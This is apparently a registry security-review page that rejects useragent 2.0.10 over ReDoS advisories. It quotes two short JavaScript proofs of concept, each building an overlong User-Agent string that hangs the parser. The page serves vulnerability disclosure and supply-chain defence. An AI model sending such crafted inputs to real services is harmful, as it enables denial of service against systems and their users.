All useragent versions

[email protected] rejected Risk: 68 MIT

useragent @2.0.10

rejected
This version was rejected. It did not pass GreenFlagged's security review and is not served by the registry. The findings and risk dispositions below explain why.
npm Repository Homepage Tarball
68
Risk Score
MIT
License
Yes
Install Scripts
1
Dependencies
7
Dev Dependencies
148.1 KB
Package Size
Published

Fastest, most accurate & effecient user agent string parser, uses Browserscope's research for parsing

Maintainers

V1

Keywords

agentbrowserbrowserscopeosparseparseruaua-parseua-parseruser agentuseruser-agentuseragentversion

Dependencies (1)

PackageConstraintRegistry Status
lru-cache 2.2.x auto_approved

Dev Dependencies (7)

PackageConstraintRegistry Status
mocha * auto_approved
semver 1.0.x auto_approved
should * auto_approved
request 2.9.x No greenflagged match
pre-commit 0.0.x No greenflagged match
yamlparser 0.0.x auto_approved
long-stack-traces 0.1.x auto_approved

Transitive Dependency Tree

1 transitive deps max depth 1
  ├─ lru-cache 2.2.x → 2.2.4

Changes from v0.1.2

Dependency Changes

ChangePackageVersion
added lru-cache 2.2.x

Script Changes

+ qa+ test+ update

License Changed

none → none

File Changes

20 added 7 removed 2 modified size delta: +1238.1 KB

Risk Dispositions (1 applicable to this version, 0 other)

Accepted rules are downgraded to INFO on future analyses; rejected rules escalate to CRITICAL.

Rule Source Disposition Author Reason
osv:GHSA-mgfv-m47x-4wqp osv reject AI AI (osv): ReDoS vulnerability (CVSS 7.5) affects all versions <= 2.3.0 with no fix published. Verdict generalizes to all versions in the affected range.

SAST Findings (3)

CRITICAL GHSA-mgfv-m47x-4wqp: useragent Regular Expression Denial of Service vulnerability osv

[Always reject] CVSS 7.5 (HIGH) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Useragent is a user agent parser for Node.js. All versions as of time of publication contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS). ## PoC ```js async function exploit() { const useragent = require(\"useragent\"); // Create a malicious user-agent that leads to excessive backtracking const maliciousUserAgent = 'Mozilla/5.0 (' + 'X'.repeat(30000) + ') Gecko/20100101 Firefox/77.0'; // Parse the malicious user-agent const agent = useragent.parse(maliciousUserAgent); // Call the toString method to trigger the vulnerability const result = await agent.device.toString(); console.log(result); } await exploit(); ```

HIGH GHSA-pjmx-9xr3-82qr: ReDoS via long UserAgent header in useragent osv

Affected versions of `useragent` are vulnerable to regular expression denial of service when an arbitrarily long `User-Agent` header is parsed. ## Proof of Concept ```js var useragent = require('useragent'); var badUserAgent = 'MSIE 0.0'+Array(900000).join('0')+'XBLWP'; var request = 'GET / HTTP/1.1\r\nUser-Agent: ' + badUserAgent + '\r\n\r\n'; console.log(useragent.parse(request)); ``` ## Recommendation Update to version 2.1.13 or later.

LOW No provenance attestation provenance

Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.

Review Summary

Risk score: 68. Findings: 1 critical (+40), 1 high (+25), 1 low (+3).

Commit: 80ea9b7bbf85 Browse source

Published to npm: